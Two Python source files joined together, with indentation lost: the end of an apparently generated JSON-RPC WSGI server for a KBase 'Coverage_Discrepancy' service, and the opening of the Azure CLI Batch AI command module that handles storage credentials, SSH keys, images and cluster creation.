return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Coverage_Discrepancy'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Coverage_Discrepancy.run_Coverage_Discrepancy,
name='Coverage_Discrepancy.run_Coverage_Discrepancy',
types=[dict])
self.method_authentication['Coverage_Discrepancy.run_Coverage_Discrepancy'] = 'required' # noqa
self.rpc_service.add(impl_Coverage_Discrepancy.status,
name='Coverage_Discrepancy.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Coverage_Discrepancy ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-many-lines
from __future__ import print_function
import collections
import copy
import datetime
import json
import os
import signal
import socket
import string
import sys
import threading
import time
from functools import partial
from random import shuffle
import paramiko
import requests
from knack.log import get_logger
from knack.util import CLIError
from msrest.serialization import Deserializer
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from six.moves import urllib_parse
from azure.cli.core import keys
from azure.cli.core.util import get_default_admin_username
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import ResourceType, get_sdk
import azure.mgmt.batchai.models as models
# Environment variables for specifying azure storage account and key. We want the user to make explicit
# decision about which storage account to use instead of using his default account specified via AZURE_STORAGE_ACCOUNT
# and AZURE_STORAGE_KEY.
AZURE_BATCHAI_STORAGE_ACCOUNT = 'AZURE_BATCHAI_STORAGE_ACCOUNT'
AZURE_BATCHAI_STORAGE_KEY = 'AZURE_BATCHAI_STORAGE_KEY'
MSG_CONFIGURE_STORAGE_ACCOUNT = 'Please configure Azure Storage account name via AZURE_BATCHAI_STORAGE_ACCOUNT or ' \
'provide storage_account value in batchai section of your az configuration file.'
MSG_CONFIGURE_STORAGE_KEY = 'Please configure Azure Storage account key via AZURE_BATCHAI_STORAGE_KEY or ' \
'provide storage_key value in batchai section of your az configuration file.'
STANDARD_OUTPUT_DIRECTORY_ID = 'stdouterr'
# Parameters of auto storage
AUTO_STORAGE_RESOURCE_GROUP = 'batchaiautostorage'
AUTO_STORAGE_CONTAINER_NAME = 'batchaicontainer'
AUTO_STORAGE_SHARE_NAME = 'batchaishare'
AUTO_STORAGE_ACCOUNT_PREFIX = 'bai'
AUTO_STORAGE_CONTAINER_PATH = 'autobfs'
AUTO_STORAGE_SHARE_PATH = 'autoafs'
# Placeholders which customer may use in his config file for cluster creation.
AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_KEY)
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_ACCOUNT)
# Default expiration time for file download URLs.
DEFAULT_URL_EXPIRY_MIN = 60
# Supported images.
SUPPORTED_IMAGE_ALIASES = {
"UbuntuLTS": models.ImageReference(
publisher='Canonical',
offer='UbuntuServer',
sku='16.04-LTS'
),
"UbuntuDSVM": models.ImageReference(
publisher='microsoft-ads',
offer='linux-data-science-vm-ubuntu',
sku='linuxdsvmubuntu'
)
}
# Type of entries reported by list startup files.
LogFile = collections.namedtuple('LogFile', 'name download_url is_directory size')
logger = get_logger(__name__)
def _get_resource_group_location(cli_ctx, resource_group):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
return client.resource_groups.get(resource_group).location
def _get_workspace_location(client, resource_group, workspace_name):
workspace = client.workspaces.get(resource_group, workspace_name)
return workspace.location
def _get_default_ssh_public_key_location():
path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
if os.path.exists(path):
return path
return None
def _get_deserializer():
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
return Deserializer(client_models)
def _ensure_resource_not_exist(client, resource_group, workspace, name):
try:
client.get(resource_group, workspace, name)
raise CLIError('"{0}" already exists in "{1}" resource group under {2} resource group.'.format(
name, resource_group, workspace))
except CloudError as e:
if e.status_code != 404:
raise
def _ensure_job_not_exist(client, resource_group, workspace, experiment, name):
try:
client.get(resource_group, workspace, experiment, name)
raise CLIError('A job with given name, experiment, workspace and resource group already exists.')
except CloudError as e:
if e.status_code != 404:
raise
def _ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name):
if not subnet:
return
if not is_valid_resource_id(subnet):
raise CLIError('Ill-formed subnet resource id')
# check there are no conflicts between provided subnet and mounted nfs
if not nfs_name:
return
nfs = None # type: models.FileServer
try:
nfs = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
except CloudError as e:
if e.status_code != 404:
raise
if not nfs:
# CLI will return the error during nfs validation
return
if nfs.subnet.id != subnet:
raise CLIError('Cluster and mounted NFS must be in the same subnet.')
def _get_storage_management_client(cli_ctx):
from azure.mgmt.storage import StorageManagementClient
return get_mgmt_service_client(cli_ctx, StorageManagementClient)
def _get_storage_account_key(cli_ctx, account_name, account_key):
"""Returns account key for the given storage account.
:param str account_name: storage account name.
:param str or None account_key: account key provide as command line argument.
"""
if account_key:
return account_key
storage_client = _get_storage_management_client(cli_ctx)
account = [a.id for a in list(storage_client.storage_accounts.list()) if a.name == account_name]
if not account:
raise CLIError('Cannot find "{0}" storage account.'.format(account_name))
resource_group = parse_resource_id(account[0])['resource_group']
keys_list_result = storage_client.storage_accounts.list_keys(resource_group, account_name)
if not keys_list_result or not keys_list_result.keys:
raise CLIError('Cannot find a key for "{0}" storage account.'.format(account_name))
return keys_list_result.keys[0].value
def _get_effective_storage_account_name_and_key(cli_ctx, account_name, account_key):
"""Returns storage account name and key to be used.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
"""
if account_name:
return account_name, _get_storage_account_key(cli_ctx, account_name, account_key) or ''
return cli_ctx.config.get('batchai', 'storage_account', ''), cli_ctx.config.get('batchai', 'storage_key', '')
def _get_account_name_from_azure_file_url(azure_file_url):
"""Extracts account name from Azure File URL
:param str azure_file_url: Azure File URL
:return str: account name
"""
if not azure_file_url:
raise CLIError('Azure File URL cannot absent or be empty')
o = urllib_parse.urlparse(azure_file_url)
try:
account, _ = o.netloc.split('.', 1)
return account
except ValueError:
raise CLIError('Ill-formed Azure File URL "{0}"'.format(azure_file_url))
def _get_effective_credentials(cli_ctx, existing_credentials, account_name):
"""Returns AzureStorageCredentialInfo for the account
:param models.AzureStorageCredentialsInfo existing_credentials: known credentials
:param str account_name: storage account name
:return models.AzureStorageCredentialsInfo: credentials to be used
"""
if existing_credentials and (existing_credentials.account_key or existing_credentials.account_key_secret_reference):
return existing_credentials
return models.AzureStorageCredentialsInfo(
account_key=_get_storage_account_key(cli_ctx, account_name, account_key=None))
def _patch_mount_volumes(cli_ctx, volumes, account_name=None, account_key=None):
"""Patches mount volumes by replacing placeholders and adding credentials information.
:param models.MountVolumes or None volumes: mount volumes.
:param str or None account_name: name of the storage account provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
if volumes is None:
return None
result = copy.deepcopy(volumes) # type: models.MountVolumes
storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(
cli_ctx, account_name, account_key)
require_storage_account = False
require_storage_account_key = False
# Patch parameters of azure file share.
if result.azure_file_shares:
for ref in result.azure_file_shares:
# Populate account name if it was not provided
if not ref.account_name:
ref.account_name = _get_account_name_from_azure_file_url(ref.azure_file_url)
# Replace placeholders
if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
require_storage_account = True
ref.account_name = storage_account_name
if ref.azure_file_url and AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER in ref.azure_file_url:
require_storage_account = True
ref.azure_file_url = ref.azure_file_url.replace(
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER, storage_account_name)
if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
require_storage_account_key = True
ref.credentials.account_key = storage_account_key
if not ref.credentials and ref.account_name == storage_account_name:
require_storage_account_key = True
ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
if ref.account_name:
ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
# Patch parameters of blob file systems.
if result.azure_blob_file_systems:
for ref in result.azure_blob_file_systems:
# Replace placeholders
if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
require_storage_account = True
ref.account_name = storage_account_name
if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
require_storage_account_key = True
ref.credentials.account_key = storage_account_key
if not ref.credentials and ref.account_name == storage_account_name:
require_storage_account_key = True
ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
# Populate the rest of credentials based on the account name
if not ref.account_name:
raise CLIError('Ill-formed Azure Blob File System reference in the configuration file - no account '
'name provided.')
if ref.account_name:
ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
if require_storage_account and not storage_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if require_storage_account_key and not storage_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
return result
def _update_user_account_settings(params, admin_user_name, ssh_key, password):
"""Update account settings of cluster or file server creation parameters
:param models.ClusterCreateParameters or models.FileServerCreateParameters params: params to update
:param str or None admin_user_name: name of admin user to create.
:param str or None ssh_key: ssh public key value or path to the file containing the key.
:param str or None password: password.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(params)
if hasattr(result, 'user_account_settings'):
parent = result
else:
if result.ssh_configuration is None:
result.ssh_configuration = models.SshConfiguration(user_account_settings=None)
parent = result.ssh_configuration
if parent.user_account_settings is None:
parent.user_account_settings = models.UserAccountSettings(admin_user_name=None)
# Get effective user name, password and key trying them in the following order: provided via command line,
# provided in the config file, current user name and his default public ssh key.
effective_user_name = admin_user_name or parent.user_account_settings.admin_user_name or get_default_admin_username() # pylint: disable=line-too-long
effective_password = password or parent.user_account_settings.admin_user_password
# Use default ssh public key only if no password is configured.
effective_key = (ssh_key or parent.user_account_settings.admin_user_ssh_public_key or
(None if effective_password else _get_default_ssh_public_key_location()))
if effective_key:
if os.path.exists(os.path.expanduser(effective_key)):
with open(os.path.expanduser(effective_key)) as f:
effective_key = f.read()
try:
if effective_key and not keys.is_valid_ssh_rsa_public_key(effective_key):
raise CLIError('Incorrect ssh public key value.')
except Exception:
raise CLIError('Incorrect ssh public key value.')
parent.user_account_settings.admin_user_name = effective_user_name
parent.user_account_settings.admin_user_ssh_public_key = effective_key
parent.user_account_settings.admin_user_password = effective_password
if not parent.user_account_settings.admin_user_name:
raise CLIError('Please provide admin user name.')
if (not parent.user_account_settings.admin_user_ssh_public_key and
not parent.user_account_settings.admin_user_password):
raise CLIError('Please provide admin user password or ssh key.')
return result
def _add_nfs_to_mount_volumes(volumes, file_server_id, mount_path):
"""Adds NFS to the mount volumes.
:param models.MountVolumes or None volumes: existing mount volumes.
:param str file_server_id: resource id of the file server.
:param str mount_path: relative mount path for the file server.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('File server relative mount path cannot be empty.')
if result.file_servers is None:
result.file_servers = []
result.file_servers.append(models.FileServerReference(
relative_mount_path=mount_path,
file_server=models.ResourceId(id=file_server_id),
mount_options="rw"))
return result
def _get_azure_file_url(cli_ctx, account_name, azure_file_share):
"""Returns Azure File URL for the given account
:param str account_name: account name
:param str azure_file_share: name of the share
:return str: Azure File URL to be used in mount volumes
"""
return 'https://{0}.file.{1}/{2}'.format(account_name, cli_ctx.cloud.suffixes.storage_endpoint, azure_file_share)
def _add_azure_file_share_to_mount_volumes(cli_ctx, volumes, azure_file_share, mount_path, account_name=None,
account_key=None):
"""Add Azure File share to the mount volumes.
:param model.MountVolumes volumes: existing mount volumes.
:param str azure_file_share: name of the azure file share.
:param str mount_path: relative mount path for Azure File share.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('Azure File share relative mount path cannot be empty.')
if result.azure_file_shares is None:
result.azure_file_shares = []
effective_account_name, effective_account_key = _get_effective_storage_account_name_and_key(cli_ctx, account_name,
account_key)
if not effective_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if not effective_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
result.azure_file_shares.append(models.AzureFileShareReference(
relative_mount_path=mount_path,
account_name=effective_account_name,
azure_file_url=_get_azure_file_url(cli_ctx, effective_account_name, azure_file_share),
credentials=models.AzureStorageCredentialsInfo(account_key=effective_account_key)))
return result
def _add_azure_container_to_mount_volumes(cli_ctx, volumes, container_name, mount_path, account_name=None,
account_key=None):
"""Add Azure Storage container to the mount volumes.
:param model.MountVolumes: existing mount volumes.
:param str container_name: container name.
:param str mount_path: relative mount path for the container.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('Azure Storage Container relative mount path cannot be empty.')
if result.azure_blob_file_systems is None:
result.azure_blob_file_systems = []
storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(cli_ctx, account_name,
account_key)
if not storage_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if not storage_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
result.azure_blob_file_systems.append(models.AzureBlobFileSystemReference(
relative_mount_path=mount_path,
account_name=storage_account_name,
container_name=container_name,
credentials=models.AzureStorageCredentialsInfo(account_key=storage_account_key)))
return result
def _get_image_reference(image, custom_image):
"""Returns image reference for the given image and custom image.
:param str image or None: image alias or full spec.
:param str custom_image or None: resource id of the custom image.
:raise CLIError: if the image with given alias was not found.
"""
if custom_image and not image:
raise CLIError('You need to specify --image argument with information about the custom image')
if custom_image and not is_valid_resource_id(custom_image):
raise CLIError('Ill-formed custom image resource id')
if ':' in image:
# full image specification is provided
try:
publisher, offer, sku, version = image.split(':')
if not publisher:
raise CLIError('Image publisher must be provided in --image argument')
if not offer:
raise CLIError('Image offer must be provided in --image argument')
if not sku:
raise CLIError('Image sku must be provided in --image argument')
return models.ImageReference(
publisher=publisher,
offer=offer,
sku=sku,
version=version or None,
virtual_machine_image_id=custom_image
)
except ValueError:
raise CLIError('--image must have format "publisher:offer:sku:version" or "publisher:offer:sku:"')
# image alias is used
reference = None
for alias, value in SUPPORTED_IMAGE_ALIASES.items():
if alias.lower() == image.lower():
reference = value
if not reference:
raise CLIError('Unsupported image alias "{0}", supported aliases are {1}'.format(
image, ', '.join(SUPPORTED_IMAGE_ALIASES.keys())))
result = copy.deepcopy(reference)
result.virtual_machine_image_id = custom_image
return result
def _get_scale_settings(initial_count, min_count, max_count):
"""Returns scale settings for a cluster with given parameters"""
if not initial_count and not min_count and not max_count:
# Get from the config file
return None
if sum([1 if v is not None else 0 for v in (min_count, max_count)]) == 1:
raise CLIError('You need to either provide both min and max node counts or not provide any of them')
if min_count is not None and max_count is not None and min_count > max_count:
raise CLIError('Maximum nodes count must be greater or equal to minimum nodes count')
if min_count == max_count:
if min_count is None or initial_count == min_count:
return models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=initial_count))
if initial_count is None:
return models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=min_count)
)
return models.ScaleSettings(
auto_scale=models.AutoScaleSettings(
minimum_node_count=min_count,
maximum_node_count=max_count,
initial_node_count=initial_count or 0))
def _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes):
"""Updates cluster's nodes information.
:param models.ClusterCreateParameters params: cluster create parameters.
:param str or None image: image.
:param str or None custom_image: custom image resource id.
:param str or None vm_size: VM size.
:param str vm_priority: Priority.
:param int or None target: initial number of nodes.
:param int or None min_nodes: min number of nodes.
:param int or None max_nodes: max number of nodes.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(params)
if vm_size:
result.vm_size = vm_size
if not result.vm_size:
raise CLIError('Please provide VM size')
if vm_priority:
result.vm_priority = vm_priority
if image or custom_image:
result.virtual_machine_configuration = models.VirtualMachineConfiguration(
image_reference=_get_image_reference(image, custom_image))
scale_settings = _get_scale_settings(target, min_nodes, max_nodes)
if scale_settings:
result.scale_settings = scale_settings
if not result.scale_settings or (not result.scale_settings.manual and not result.scale_settings.auto_scale):
raise CLIError('Please provide scale setting for the cluster via command line or configuration file')
return result
def _get_auto_storage_resource_group():
return AUTO_STORAGE_RESOURCE_GROUP
def _configure_auto_storage(cli_ctx, location):
"""Configures auto storage account for the cluster
:param str location: location for the auto-storage account.
:return (str, str): a tuple with auto storage account name and key.
"""
ResourceGroup = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'ResourceGroup', mod='models')
BlockBlobService, FileService = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
'blob#BlockBlobService', 'file#FileService')
resource_group = _get_auto_storage_resource_group()
resource_client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
if resource_client.resource_groups.check_existence(resource_group):
logger.warning('BatchAI will use existing %s resource group for auto-storage account',
resource_group)
else:
logger.warning('Creating %s resource group for auto-storage account', resource_group)
resource_client.resource_groups.create_or_update(
resource_group, ResourceGroup(location=location))
storage_client = _get_storage_management_client(cli_ctx)
account = None
for a in storage_client.storage_accounts.list_by_resource_group(resource_group):
if a.primary_location == location.lower().replace(' ', ''):
account = a.name
logger.warning('Using existing %s storage account as an auto-storage account', account)
break
if account is None:
account = _create_auto_storage_account(storage_client, resource_group, location)
logger.warning('Created auto storage account %s', account)
key = _get_storage_account_key(cli_ctx, account, None)
file_service = FileService(account, key)
file_service.create_share(AUTO_STORAGE_SHARE_NAME, fail_on_exist=False)
blob_service = BlockBlobService(account, key)
blob_service.create_container(AUTO_STORAGE_CONTAINER_NAME, fail_on_exist=False)
return account, key
def _generate_auto_storage_account_name():
"""Generates unique name for auto storage account"""
characters = list(string.ascii_lowercase * 12)
shuffle(characters)
return AUTO_STORAGE_ACCOUNT_PREFIX + ''.join(characters[:12])
def _create_auto_storage_account(storage_client, resource_group, location):
"""Creates new auto storage account in the given resource group and location
:param StorageManagementClient storage_client: storage client.
:param str resource_group: name of the resource group.
:param str location: location.
:return str: name of the created storage account.
"""
from azure.mgmt.storage.models import Kind, Sku, SkuName
name = _generate_auto_storage_account_name()
check = storage_client.storage_accounts.check_name_availability(name)
while not check.name_available:
name = _generate_auto_storage_account_name()
check = storage_client.storage_accounts.check_name_availability(name).name_available
storage_client.storage_accounts.create(resource_group, name, {
'sku': Sku(name=SkuName.standard_lrs),
'kind': Kind.storage,
'location': location}).result()
return name
def _add_setup_task(cmd_line, output, cluster):
"""Adds a setup task with given command line and output destination to the cluster.
:param str cmd_line: node setup command line.
:param str output: output destination.
:param models.ClusterCreateParameters cluster: cluster creation parameters.
"""
if cmd_line is None:
return cluster
if output is None:
raise CLIError('--setup-task requires providing of --setup-task-output')
cluster = copy.deepcopy(cluster)
cluster.node_setup = cluster.node_setup or models.NodeSetup()
cluster.node_setup.setup_task = models.SetupTask(
command_line=cmd_line,
std_out_err_path_prefix=output,
run_elevated=False)
return cluster
def _generate_ssh_keys():
"""Generates ssh keys pair"""
private_key_path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa')
public_key_path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
keys.generate_ssh_keys(private_key_path, public_key_path)
logger.warning('Attempted to find or generate SSH key files id_rsa and id_rsa.pub under ~/.ssh to allow SSH access '
'to the nodes. If using machines without permanent storage, back up your keys to a safe location.')
def list_workspaces(client, resource_group=None):
if resource_group:
return client.list_by_resource_group(resource_group)
return client.list()
def create_workspace(cmd, client, resource_group, workspace_name, location=None):
location = location or _get_resource_group_location(cmd.cli_ctx, resource_group)
return client.create(resource_group, workspace_name, location).result()
def create_experiment(client, resource_group, workspace_name, experiment_name):
return client.create(resource_group, workspace_name, experiment_name).result()
def _get_effective_resource_parameters(name_or_id, resource_group, workspace):
"""Returns effective resource group, workspace and name for the given resource"""
if not name_or_id:
return None, None, None
if is_valid_resource_id(name_or_id):
parts = parse_resource_id(name_or_id)
return parts['resource_group'], parts['name'], parts['resource_name']
return resource_group, workspace, name_or_id
def create_cluster(cmd, client, # pylint: disable=too-many-locals
resource_group, workspace_name, cluster_name, json_file=None, user_name=None,
ssh_key=None, password=None, generate_ssh_keys=None, image=None, custom_image=None,
use_auto_storage=False, vm_size=None, vm_priority=None, target=None, min_nodes=None,
max_nodes=None, subnet=None, nfs=None, nfs_mount_path='nfs', azure_file_share=None,
afs_mount_path='afs', container_name=None, container_mount_path='bfs', account_name=None,
account_key=None, setup_task=None, setup_task_output=None):
if generate_ssh_keys:
_generate_ssh_keys()
if ssh_key is None:
ssh_key = _get_default_ssh_public_key_location()
_ensure_resource_not_exist(client.clusters, resource_group, workspace_name, cluster_name)
nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
nfs, resource_group, workspace_name)
_ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name)
if json_file:
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('ClusterCreateParameters', json_obj)
else:
# noinspection PyTypeChecker
params = models.ClusterCreateParameters(vm_size=None, user_account_settings=None)
if params.node_setup:
params.node_setup.mount_volumes = _patch_mount_volumes(
